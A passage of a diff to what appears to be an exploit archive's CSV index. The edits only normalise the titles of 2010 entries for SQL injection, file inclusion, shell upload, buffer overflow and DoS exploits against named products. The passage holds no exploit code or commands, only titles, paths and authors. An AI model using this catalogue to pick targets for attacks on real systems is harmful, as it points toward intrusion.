1.5.3 - (id) SQL Injection Vulnerability",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0 @@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,Blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0 -12257,platforms/php/webapps/12257.txt,"Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 +12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"Laurent Gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x DoS",2010-04-16,ITSecTeam,php,dos,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0 @@ -11191,7 +11191,7 @@ id,file,description,date,author,platform,type,port 12263,platforms/multiple/remote/12263.txt,"Apache OFBiz SQL Remote Execution PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12264,platforms/multiple/remote/12264.txt,"Apache OFBiz FULLADMIN Creator PoC Payload",2010-04-16,"Lucas Apa",multiple,remote,0 12265,platforms/hardware/remote/12265.txt,"Unauthenticated File-system Access in Iomega Home Media Network Hard Drive v. 2.038 - 2.061",2010-04-16,fizix610,hardware,remote,0 -12266,platforms/php/webapps/12266.txt,"60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit",2010-04-16,EL-KAHINA,php,webapps,0 +12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - CSRF Change Username & Password Exploit",2010-04-16,El-Kahina,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 Shell Upload Vulnerability",2010-04-16,DigitALL,php,webapps,0 12269,platforms/php/webapps/12269.txt,"Joomla Component com_joltcard SQL Injection Vulnerability",2010-04-16,Valentin,php,webapps,0 @@ -11199,7 +11199,7 @@ id,file,description,date,author,platform,type,port 12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x Shell Upload Vulnerability",2010-04-17,DigitALL,php,webapps,0 12273,platforms/windows/dos/12273.py,"Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC",2010-04-17,"Laurent Gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 -12276,platforms/php/webapps/12276.txt,"Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0 +12276,platforms/php/webapps/12276.txt,"redaxo cms 4.2.1 - Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0 12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-18,cr4wl3r,php,webapps,0 12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 SQL Injection Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0 12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0 @@ -11216,7 +11216,7 @@ id,file,description,date,author,platform,type,port 12291,platforms/php/webapps/12291.txt,"Joomla Component iF surfALERT com_if_surfalert Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack buffer overflow",2010-04-19,corelanc0d3r,windows,local,0 -12294,platforms/windows/dos/12294.txt,"AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 +12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) activex Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,cr4wl3r,php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 @@ -11224,7 +11224,7 @@ id,file,description,date,author,platform,type,port 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK SQL injection vulnerability",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 -12303,platforms/php/webapps/12303.pl,"MusicBox v 3.3 SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 +12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,chr1x,multiple,remote,0 12305,platforms/php/webapps/12305.txt,"Joomla com_jnewspaper (cid) SQL Injection Vulnerability",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla Component JTM Reseller SQL injection vulnerability",2010-04-20,kaMtiEz,php,webapps,0 @@ -11241,7 +11241,7 @@ id,file,description,date,author,platform,type,port 12319,platforms/php/webapps/12319.txt,"e107 CMS <= 0.7.19 CSRF Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x Multiple Vulnerabilite",2010-04-21,ITSecTeam,php,webapps,0 -12323,platforms/php/webapps/12323.txt,"WB News (Webmobo) 2.3.3 Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 +12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers Audio Tag DoS Vulnerability",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla Component com_portfolio Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 12326,platforms/windows/local/12326.py,"ZipGenius zgtips.dll Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 @@ -11249,12 +11249,12 @@ id,file,description,date,author,platform,type,port 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple XSS",2010-04-21,"Lucas Apa",php,webapps,0 12331,platforms/windows/remote/12331.txt,"MultiThreaded HTTP Server 1.1 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 -12333,platforms/php/webapps/12333.txt,"CmS (id) SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 +12333,platforms/php/webapps/12333.txt,"cms - (id) SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL remote DoS",2010-04-22,Andi,linux,dos,0 12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 -12338,platforms/php/webapps/12338.txt,"Cacti Version <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12339,platforms/php/webapps/12339.txt,"Cacti Version <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12338,platforms/php/webapps/12338.txt,"Cacti <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 +12339,platforms/php/webapps/12339.txt,"Cacti <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy - Vulnerability",2010-04-22,_SuBz3r0_,php,webapps,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC",2010-04-22,LiquidWorm,windows,local,0 @@ -11264,15 +11264,15 @@ id,file,description,date,author,platform,type,port 12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - (id) Multiple SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection Vulnerability",2010-04-22,v3n0m,php,webapps,0 12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 Remote Arbitrary File Upload Exploit",2010-04-23,eidelweiss,php,webapps,0 -12351,platforms/php/webapps/12351.txt,"Memorial Web Site Script (id) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 +12351,platforms/php/webapps/12351.txt,"memorial web site script - (id) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 12353,platforms/php/webapps/12353.txt,"EPay Enterprise 4.13 - (cid) SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 12354,platforms/php/webapps/12354.pl,"NKINFOWEB SQL Injection Exploit",2010-04-23,d4rk-h4ck3r,php,webapps,0 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS SQL Injection Vulnerability",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial Of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 -12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script --> Reset Password & Insecure Cookie Handling",2010-04-23,"Chip D3 Bi0s",php,webapps,0 +12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password & Insecure Cookie Handling",2010-04-23,"Chip D3 Bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script Multiple Arbitrary Delete Vuln",2010-04-23,"Chip D3 Bi0s",php,webapps,0 12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 (tempid) Remote SQL Injection Vulnerability",2010-04-23,v3n0m,php,webapps,0 -12361,platforms/php/webapps/12361.txt,"LaNewsFactory Multiple Remote Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 +12361,platforms/php/webapps/12361.txt,"lanewsfactory Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 Local File Include Vulnerability",2010-04-24,cr4wl3r,php,webapps,0 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability",2010-04-24,cr4wl3r,php,webapps,0 12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-04-24,cr4wl3r,php,webapps,0 @@ -11295,7 +11295,7 @@ id,file,description,date,author,platform,type,port 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0 12385,platforms/php/webapps/12385.html,"TR Forum 1.5 insert admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,"indoushka salah el ddine",php,webapps,0 -12387,platforms/php/webapps/12387.sh,"WebEssence 1.0.2 Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0 +12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Meta)",2010-04-25,Blake,windows,local,0 12395,platforms/php/webapps/12395.txt,"2daybiz Advanced Poll Script XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 Local File Include Vulnerability",2010-04-26,cr4wl3r,php,webapps,0 @@ -11303,7 +11303,7 @@ id,file,description,date,author,platform,type,port 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL injection vulnerability",2010-04-26,Mr.tro0oqy,php,webapps,0 12401,platforms/multiple/dos/12401.html,"WebKit <= 532.5 Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 -12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability",2010-04-26,"indoushka salah el ddine",php,webapps,0 +12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,"indoushka salah el ddine",php,webapps,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0 @@ -11357,8 +11357,8 @@ id,file,description,date,author,platform,type,port 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Win32) CSS Remote Denial Of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote Vulnerability",2010-04-29,cr4wl3r,php,webapps,0 -12459,platforms/php/webapps/12459.txt,"EC21 Clone 3.0 (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 -12460,platforms/php/webapps/12460.txt,"B2B Gold Script (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 +12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 +12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 & 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 @@ -11390,14 +11390,14 @@ id,file,description,date,author,platform,type,port 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0day)",2010-05-03,R3d-D3v!L,windows,dos,0 -12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 +12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - remote post-auth exploit (ASLR and DEP bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12496,platforms/php/webapps/12496.html,"KubeBlog CSRF",2010-05-03,The.Morpheus,php,webapps,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X .tif file local buffer overflow poc (0day)",2010-05-04,"fl0 fl0w",windows,local,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 -12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 Stored XSS",2010-05-04,ITSecTeam,php,webapps,0 +12499,platforms/php/webapps/12499.txt,"dbhcms 1.1.4 - Stored XSS",2010-05-04,ITSecTeam,php,webapps,0 12500,platforms/php/webapps/12500.txt,"Clicksor SQL Injecti0n Vulnerability",2010-05-04,JM511,php,webapps,0 12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-05-04,mr_me,windows,local,0 -12504,platforms/php/webapps/12504.txt,"thEngine v0.1 LFI Vulnerability",2010-05-04,team_elite,php,webapps,0 +12504,platforms/php/webapps/12504.txt,"thEngine 0.1 - LFI Vulnerability",2010-05-04,team_elite,php,webapps,0 12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-04,eidelweiss,php,webapps,0 12507,platforms/php/webapps/12507.txt,"SmartCMS v.2 SQL Injection Vulnerability",2010-05-04,Ariko-Security,php,webapps,0 12508,platforms/osx/dos/12508.html,"history.go() DoS on multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 @@ -11406,7 +11406,7 @@ id,file,description,date,author,platform,type,port 12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,Kingcope,windows,remote,0 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 Cross Application Scripting",2010-05-05,sinn3r,windows,remote,0 12514,platforms/php/webapps/12514.txt,"PHP-NUKE 5.0 - Viewslink Remote SQL Injection",2010-05-05,CMD,php,webapps,0 -12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album v0.2.7 Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te hacker",php,webapps,0 +12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te hacker",php,webapps,0 12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 LFI",2010-05-06,Batch,php,webapps,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005",2010-05-06,unsign,windows,dos,0 @@ -11424,38 +11424,38 @@ id,file,description,date,author,platform,type,port 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer Remote DoS Vulnerability",2010-05-08,aviho1,windows,dos,0 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0 -12533,platforms/php/webapps/12533.txt,"(big.asp) SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0 +12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ItSecTeam,php,webapps,0 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,Blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 -12543,platforms/php/webapps/12543.rb,"Alibaba Clone Version <= 3.0 (Special) SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 -12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 +12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 +12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Vulnerability Exploit",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 (.asx) Local DoS crash PoC",2010-05-10,"Steve James",windows,dos,0 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection Vulnerability",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 12551,platforms/php/webapps/12551.txt,"Spaceacre Multiple SQL Injection Vulnerability",2010-05-10,Gendenk,php,webapps,0 -12552,platforms/php/webapps/12552.txt,"tekno.Portal v 0.1b (makale.php id) SQL Injection Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 +12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - (makale.php id) SQL Injection Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0 -12555,platforms/multiple/dos/12555.txt,"Pargoon CMS all version DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0 +12555,platforms/multiple/dos/12555.txt,"Pargoon CMS all version - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0 -12557,platforms/php/webapps/12557.txt,"Family Connections 2.2.3 Multiple Remote Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 +12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,Cyberlog,php,webapps,0 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection Vulnerabilities",2010-05-10,R3d-D3v!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil Remote / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 -12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice Multi Vulnerability",2010-05-10,MasterGipy,php,webapps,0 +12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 -12567,platforms/php/webapps/12567.html,"Aqar Script V.1 Remote By pass Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0 +12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0 12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload Vulnerability",2010-05-11,"indoushka salah el ddine",php,webapps,0 12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site Upload Shell Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0 -12570,platforms/php/webapps/12570.txt,"Uploader v0.1.5 Multiple Vulnerabilities",2010-05-11,"indoushka salah el ddine",php,webapps,0 +12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,"indoushka salah el ddine",php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech (page.asp) SQL Injection Vulnerability",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment cms (user_info.php) SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0 12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit",2010-05-11,"Krystian Kloskowski",windows,remote,0 @@ -11465,14 +11465,14 @@ id,file,description,date,author,platform,type,port 12577,platforms/php/webapps/12577.txt,"Marinet cms SQL/XSS/HTML Injection Vulnerability",2010-05-11,CoBRa_21,php,webapps,0 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip D3 Bi0s",php,webapps,0 -12580,platforms/windows/remote/12580.txt,"miniwebsvr v0.0.10 Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 -12581,platforms/windows/remote/12581.txt,"zervit Web Server v0.4 Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 -12582,platforms/windows/remote/12582.txt,"zervit Web Server v0.4 Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 +12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 +12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 +12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,Fl0riX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 sql injection exploit",2010-05-13,Cryptovirus,php,webapps,0 -12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 Multiple remote vulnerabilities(0day)",2010-05-13,"fl0 fl0w",linux,remote,21 +12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities(0day)",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba Multiple DoS Vulnerabilities",2010-05-13,"Laurent Gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te hacker",php,webapps,0 @@ -11483,7 +11483,7 @@ id,file,description,date,author,platform,type,port 12596,platforms/php/webapps/12596.txt,"Link Bid Script (links.php id) SQL Injection Vulnerability",2010-05-14,R3d-D3v!L,php,webapps,0 12597,platforms/php/webapps/12597.txt,"Press Release 